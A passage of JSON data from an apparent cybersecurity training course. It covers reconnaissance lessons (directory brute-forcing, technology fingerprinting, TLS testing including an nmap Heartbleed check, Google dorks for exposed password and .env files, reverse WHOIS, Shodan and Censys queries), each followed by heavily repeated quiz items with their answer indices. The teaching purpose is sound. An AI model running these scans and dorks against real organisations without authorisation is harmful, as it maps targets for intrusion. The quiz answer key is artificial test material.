server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-content-discovery","cat":"Reconnaissance","title":"Web Content Discovery","diff":1,"xp":75,"intro":"Find hidden files and directories on web servers.","sections":[{"type":"text","content":"Gobuster, ffuf, and dirsearch brute-force paths to find admin panels, backup files, config files, and API endpoints."},{"type":"code","lang":"bash","content":"gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt\nffuf -u https://target.com/FUZZ -w common.txt -mc 200,301,302\ndirsearch -u https://target.com"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Content discovery finds...","opts":["Open ports","Hidden files, directories, and admin panels","Email addresses","DNS records"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-wappalyzer2","cat":"Reconnaissance","title":"Web Technology Stack Detection","diff":1,"xp":75,"intro":"Identify CMS, frameworks, and server software.","sections":[{"type":"text","content":"WhatWeb, Wappalyzer, and BuiltWith fingerprint technologies from HTTP headers, cookies, HTML content, and JavaScript."},{"type":"code","lang":"bash","content":"whatweb target.com -v\ncurl -sI target.com | grep -iE 'server|x-powered|x-generator'\nwappalyzer https://target.com"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Technology detection helps find...","opts":["User passwords","Version-specific vulnerabilities in identified software","Network topology","Physical locations"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-ssl-analysis","cat":"Reconnaissance","title":"SSL/TLS Configuration Analysis","diff":2,"xp":150,"intro":"Test SSL/TLS for weak ciphers, expired certs, and known vulnerabilities.","sections":[{"type":"text","content":"testssl.sh and sslscan check for: weak ciphers (RC4, DES), deprecated protocols (SSLv3, TLS 1.0), expired certificates, and known attacks (BEAST, POODLE, Heartbleed)."},{"type":"code","lang":"bash","content":"testssl.sh target.com\nsslscan target.com\nnmap --script ssl-enum-ciphers -p 443 target.com\nnmap --script ssl-heartbleed -p 443 target.com"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"testssl.sh checks for...","opts":["Open ports","SSL/TLS configuration weaknesses and known attacks","DNS records","Web vulnerabilities"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-screenshot-mass","cat":"Reconnaissance","title":"Mass Web Screenshot","diff":2,"xp":150,"intro":"Screenshot hundreds of web services at once for visual recon.","sections":[{"type":"text","content":"EyeWitness, gowitness, and aquatone capture screenshots of all discovered web services for rapid visual identification."},{"type":"code","lang":"bash","content":"eyewitness --web -f urls.txt --no-prompt -d output/\ngowitness scan -f urls.txt --screenshot-path shots/\ncat urls.txt | aquatone"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Mass screenshots help identify...","opts":["Vulnerabilities","Admin panels, default pages, and interesting apps visually","Credentials","DNS records"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-google-dorking-advanced","cat":"Reconnaissance","title":"Advanced Google Dorking","diff":2,"xp":150,"intro":"Complex search operator chains for deep OSINT.","sections":[{"type":"text","content":"Combine operators: site: + filetype: + intitle: + inurl: to find specific exposed files, login pages, and sensitive documents."},{"type":"code","lang":"bash","content":"site:target.com filetype:sql 'password'\nsite:target.com intitle:'index of' '/backup/'\nsite:target.com ext:env OR ext:yml 'password'\ninurl:admin site:target.com -www"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Combining Google operators helps find...","opts":["General web pages","Specific exposed files and sensitive content","Social media profiles","News articles"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-whois-reverse","cat":"Reconnaissance","title":"Reverse WHOIS Lookup","diff":2,"xp":150,"intro":"Find all domains registered by the same entity.","sections":[{"type":"text","content":"Reverse WHOIS searches by registrant name, email, or organization to discover all domains owned by the target."},{"type":"code","lang":"bash","content":"# Reverse WHOIS by registrant org\nwhoisxmlapi.com/reverse-whois\n# By registrant email\ncurl 'https://api.viewdns.info/reversewhois/?q=admin@target.com&output=json'\n# ViewDNS reverse IP\ncurl 'https://api.viewdns.info/reverseip/?host=1.2.3.4&output=json'"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Reverse WHOIS finds...","opts":["IP addresses","All domains registered by the same entity","DNS records","SSL certificates"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-shodan-filters","cat":"Reconnaissance","title":"Shodan Advanced Filters","diff":3,"xp":200,"intro":"Use Shodan's powerful filters to find specific exposed services.","sections":[{"type":"text","content":"Shodan filters: port:, org:, country:, hostname:, product:, version:, ssl.cert.subject.cn: \u2014 combine for precise targeting."},{"type":"code","lang":"bash","content":"shodan search 'org:\"Target Corp\" port:22'\nshodan search 'hostname:target.com http.title:\"Dashboard\"'\nshodan search 'ssl.cert.subject.cn:target.com port:443'\nshodan search 'product:apache version:2.4.49'"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Shodan's org: filter searches by...","opts":["Open ports","Organization name in WHOIS data","Country","Product version"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"r-censys-search","cat":"Reconnaissance","title":"Censys Internet Search","diff":3,"xp":200,"intro":"Search Censys for exposed services, certificates, and hosts.","sections":[{"type":"text","content":"Censys indexes the entire internet. Search by certificate CN, service banners, protocols, and autonomous systems."},{"type":"code","lang":"bash","content":"censys search 'services.tls.certificates.leaf.subject.common_name:target.com'\ncensys search 'services.http.response.body:\"Target Corp\"'\ncensys search 'autonomous_system.asn:12345'"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Censys differs from Shodan by...","opts":["Being slower","Providing certificate and protocol-level search depth","Being free only","Scanning less"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is 